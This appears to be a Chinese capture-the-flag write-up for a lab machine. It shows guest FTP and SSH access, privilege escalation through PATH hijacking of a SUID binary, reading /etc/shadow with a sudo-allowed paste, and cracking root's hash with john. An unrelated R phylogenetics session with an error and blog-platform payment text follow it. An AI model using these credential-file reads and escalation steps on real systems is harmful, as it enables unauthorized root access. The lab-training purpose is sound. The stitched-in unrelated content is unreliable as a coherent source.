20250713_Tree_Paste

target:192.168.1.61

打点

nmap 扫描 21,22,80 端口

ftp $ip

└─# ftp 192.168.1.61
Connected to 192.168.1.61.
220 220 Welcome to FTP Service Please use guest:guest to login
Name (192.168.1.61:kali): 

提示 guest 登录后,ftp 内无内容

ssh 连接 guest 用户,成功登录

提权

查看 suid 文件

有一个 change 文件,运行后报找不到 chpasswd 路径的错误

在自己主目录下写一个 chpasswd

# chpasswd
/bin/bash

然后将自己的目录添加到环境变量里
export PATH=$PATH:(echo ~)
再次执行,看到 change 报错出 film 密码

在这里插入图片描述

其实这里的 chpasswd 可能更应该写其他内容,不过这里过了就行

拿到 film,sudo -l 查看到特权命令 paste

这个 paste 是一个简单的文本处理工具,主要用于合并文件内容

直接读取 /etc/shadow

sudo paste /etc/shadow /dev/null # 尝试读取 shadow 文件

最后爆破一下 root 密码

john hash

得到

root:sexybitch!

切换 root ,提权成功

R R version 4.2.2 (2022-10-31) -- "Innocent and Trusting" Copyright (C) 2022 The R Foundation for Statistical Computing Platform: x86_64-conda-linux-gnu (64-bit) R is free software and comes with ABSOLUTELY NO WARRANTY. You are welcome to redistribute it under certain conditions. Type 'license()' or 'licence()' for distribution details. Natural language support but running in an English locale R is a collaborative project with many contributors.Type 'contributors()' for more information and 'citation()' on how to cite R or R packages in publications. Type 'demo()' for some demos, 'help()' for on-line help, or 'help.start()' for an HTML browser interface to help. Type 'q()' to quit R. library(ape) setwd("/ifs1/User/dengwei/NTF_data/7.14/rooted_species_tree") species_tree <- read.tree("species_tree.treefile")> compare_trees <- function(gene_tree_file, species_tree) { gene_tree <- read.tree(gene_tree_file) diff_count <- comparePhylo(gene_tree, species_tree, force.rooted = TRUE) return(diff_count) } batch_compare_trees <- function(gene_tree_folder, species_tree) { gene_tree_files <- list.files(path = gene_tree_folder, pattern = ".treefile", full.names = TRUE) diff_counts <- data.frame(Gene_Tree_File = gene_tree_files, Diff_Count = numeric(length(gene_tree_files)), stringsAsFactors = FALSE) for (i in seq_along(gene_tree_files)) { gene_tree_file <- gene_tree_files[i] diff_counts$Diff_Count[i] <- compare_trees(gene_tree_file, species_tree) } return(diff_counts) } gene_tree_folder <- "/ifs1/User/dengwei/NTF_data/7.14/rooted_gene_tree" diff_counts <- batch_compare_trees(gene_tree_folder, species_tree) Error in if (n1 == n2) paste("Both trees have the same number of tips:", : the condition has length > 1
07-15
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值